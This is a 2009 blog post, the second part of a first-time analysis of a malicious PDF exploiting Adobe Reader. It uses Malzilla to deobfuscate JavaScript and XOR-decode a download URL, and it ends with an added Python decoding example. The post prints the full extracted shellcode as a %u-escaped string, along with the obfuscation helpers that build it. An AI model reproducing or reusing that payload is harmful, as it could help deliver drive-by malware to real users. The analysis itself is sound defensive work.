Wednesday, May 27, 2009

Analyzing a Malicious PDF (part 2)

In part 1, we uncompressed the obfuscated JavaScript from a malicious PDF attempting to exploit vulnerabilities in some versions of Adobe Reader. I should note that I'm certainly not an expert at this, and in fact, this is the very first time I've attempted it! I'd appreciate any comments you are willing to make.

Doing some googling makes it look pretty easy, but most of the blogs and tutorials I found seem to have JavaScript that contains an eval() or plainly obvious escaped Unicode (%uXXXX%uXXXX sequences). This code doesn't seem to have that... or does it?

I spent some more time staring at it and some of it starts to make more sense, and I think I might be able to get it to give me the escaped Unicode sequence.

function ONG5XToO(arg) {
    // Walks the hex string four characters at a time and turns each group
    // into one %uXXXX escape, so "41414949" becomes "%u4141%u4949".
    var out = "";
    for (var i = 0; i < arg.length; i = i + 4) {
        // Each two-character pair is parsed as hex and re-emitted as hex, which
        // only normalizes the digits to lower case: essentially a pass-through.
        var br1 = parseInt('0x' + arg[i] + arg[i+1], 16).toString(16);
        var br2 = parseInt('0x' + arg[i+2] + arg[i+3], 16).toString(16);
        if (br2.length == 1) { br2 = "0" + br2; }  // re-pad the leading zero that toString(16) drops
        if (br1.length == 1) { br1 = "0" + br1; }
        out = out + "%u" + br1 + br2;
    }
    return out;
}

For instance, the function above looks like it is used to build that Unicode sequence, and it is called on the large mess of strings and regexes just after it. Also, something I overlooked earlier: they are calling unescape() on that large string of Unicode characters and trying to hide it behind the obfuscated name shown below:

function auHWvCNa() {
    wVyLUt7Tb = unescape;  // the built-in unescape() aliased to a random-looking global name
    // ... the rest of the function body is not reproduced here
}


SpiderMonkey is a tool that can parse JavaScript and is used by many security professionals for this kind of work. I played with it a little bit and unfortunately didn't get too far with it, and probably gave up too early. Another tool I found was Malzilla, a Swiss-army knife for analyzing malicious JavaScript.

I pasted the JavaScript into Malzilla's Decoder tab and clicked "Run Script". "Script Compiled", but nothing else. Instead of reading the manual, I started messing around. Eventually, I changed the wVyLUt7Tb in front of the suspected shellcode in function auHWvCNa() to an eval, and ran the script again. This time I got some results, although also a message that the script could not be compiled (maybe actually having something more than passing knowledge of JavaScript may be useful ;) )


%u4141%u4149%u4949%u4941%u4949%u4949%ue890%u0000%u0000%u8359%u0cc1%u3180%u4144%u3980%u75c3%u83b3%ubb05%u3762%u2834%u0582%u7947%u8fac%u4444%ucd44%u2c83%ub9cd%ue056%uac13%u44bf%u4444%u2c14%u2a2b%u4444%u312c%u2836%u1029%u94bb%u252c%ua865%u14a0%ua6ac%u4444%ucd44%u2c82%u945d%u4692%uac13%u4491%u4444%ubb2c%u4444%u2e44%ubb04%u1494%u022c%ubb6b%u1381%u84ac%u4444%u1f44%u2e17%u2c04%u44bb%u4444%ubb17%u1494%u44ac%u4444%u1d44%u85c7%u054e%uc522%u1e7d%u311e%u05bc%u1705%u9675%u1616%ubb2c%u4444%u1744%u1615%u92bb%ubcc7%u3044%ud441%u1414%u75af%u2d2c%u4a6e%u1305%u38ac%u4444%u2e44%u2c21%u6a25%u3c21%ucf10%u6048%u18cf%u4860%u1715%u94bb%u2c12%ub30f%u452a%uac13%u4419%u4444%u1a1a%u442e%ubb12%u2e94%u2c28%u302a%u2820%ubb10%u6010%u2c60%u2fa5%u925d%uac14%u447b%u4444%u94bb%u7512%u2084%u74e5%u4444%u3c44%ucf48%u4804%u34cf%ue958%u04cf%uaf4c%ucf4d%u7004%u04c9%ucf38%u7804%u871a%ucd11%ucfa1%u4c01%u7516%u8596%u4786%u5476%uc404%u447c%ub131%u94cd%u8d1e%u4086%u1144%ua1cd%u1312%u8475%u19cf%ucf48%u4c31%ub3cd%u3247%ucf78%u3c0a%ubd45%u15cf%u1658%u15cf%u1660%u35cf%u4564%uddba%ue90e%u4706%u4c01%uac14%ubbf0%ubbbb%u9c7d%ub531%u01cf%ud64c%u451a%u9592%u45a4%u75b4%u4b8d%u4cf3%u851b%u46a5%u9545%ubd45%u45cf%u9445%u1a1b%u868d%u444c%u1e1e%u302c%u3430%u6b7e%u736b%u6a7d%u7d7d%u756a%u7777%u736a%u6b71%u3c2b%u2829%u350e%u6a06%u3c21%u7b21%u212a%u7933%u6277%u7931%u1b22%u1b77%u7475%u2762%u7927%u627b%u3037%u7779%u3132%u622d%u2930%u7479%u7474%u7574%u6276%u7936%u7d2f%u2a36%u3431%u2f3d%u622a%u7931%u1b22%u1b77%u7475%uc3c3%uc3c3%u3170


That looks more like what the tutorials are showing! I copied and pasted that into the Misc Decoders tab in Malzilla, clicked the Decode UCS2 (%u) button, and went on over to the Hex tab. I wonder if this is the shellcode? I don't see a URL unfortunately, but sometimes these are further obfuscated.

Right-clicking in the Hex tab of the Misc Decoders tab allows you to copy as hex, and then you can paste as hex into other tabs. In the Hex view you can disassemble the hex, as well as do an XOR search. Let's see if the URL is XORed then! Since I already know what the PDF is trying to download, I can search for the exe itself, but let's try "http". I used a max key of FFF. Hmmm, nothing. Let's try "thpt" (little-endian order). Key Found! Excellent, a key of 44 is found, and pressing the Apply XOR button changes the view, and the URL becomes apparent.

thpt/:7/.9991.337./5xolmqJ.Bxe?een=w&3=u_f_301c&=c&?ts3=uv&imt0=0010&2=r9knrpuky&n=u_f_301‡‡‡‡u4DaDtDt


Well, that's enough of the URL to make me think this is definitely the shellcode. Now it can be further analyzed if required with a debugger or disassembler like IDA Pro.
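To reproduce the decode-and-search steps above outside Malzilla, here is an added Python example (not from the post and not Malzilla's code) that decodes %uXXXX escapes to bytes, brute-forces a single-byte XOR key for a known substring, and returns the key and the exposed string. It runs on a constructed sample (a URL on example.invalid XOR-encoded with key 0x44), not on the post's shellcode, and its swap_words switch shows why the search for "thpt" worked: that is "http" as seen when the %u words are read in printed order rather than as little-endian 16-bit values.

```python
import re

# Constructed sample, not the post's shellcode: the URL below XOR-encoded with the
# single-byte key 0x44 and packed into %uXXXX words the way real shellcode is
# (each word is a little-endian 16-bit value), after a short padding prefix.
def make_sample(plain: bytes, key: int) -> str:
    enc = bytes(b ^ key for b in plain)
    if len(enc) % 2:
        enc += bytes([key])  # pad to a whole 16-bit word (becomes a NUL once decoded)
    return "".join("%%u%02x%02x" % (enc[i + 1], enc[i]) for i in range(0, len(enc), 2))

SAMPLE = "%u4141%u4149" + make_sample(b"http://example.invalid/a.exe", 0x44)

def decode_ucs2(escaped: str, swap_words: bool = True) -> bytes:
    """Turn %uXXXX escapes into raw bytes.
    swap_words=True emits each word little-endian, i.e. the true byte stream;
    swap_words=False keeps the hex digits in printed order, which is the view
    in which the post had to search for "thpt" instead of "http"."""
    out = bytearray()
    for word in re.findall(r"%u([0-9a-fA-F]{4})", escaped):
        hi, lo = int(word[:2], 16), int(word[2:], 16)
        out += bytes([lo, hi]) if swap_words else bytes([hi, lo])
    return bytes(out)

def xor_search(data: bytes, needle: bytes, max_key: int = 0xFF) -> list:
    """Brute-force every single-byte XOR key; return [(key, offset)] pairs at
    which needle appears in the decoded data (Malzilla's XOR search on the Hex tab)."""
    hits = []
    for key in range(max_key + 1):
        decoded = bytes(b ^ key for b in data)
        offset = decoded.find(needle)
        if offset != -1:
            hits.append((key, offset))
    return hits

def recover_url(escaped: str, needle: bytes = b"http"):
    """The post's workflow end to end: decode the %u string, find the XOR key
    that exposes the needle, apply it and return (key, url), or None if no key fits."""
    data = decode_ucs2(escaped)
    for key, offset in xor_search(data, needle):
        decoded = bytes(b ^ key for b in data)
        url = decoded[offset:].split(b"\x00")[0].decode("latin-1")
        return key, url
    return None

if __name__ == "__main__":
    print(recover_url(SAMPLE))  # (68, 'http://example.invalid/a.exe')
```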
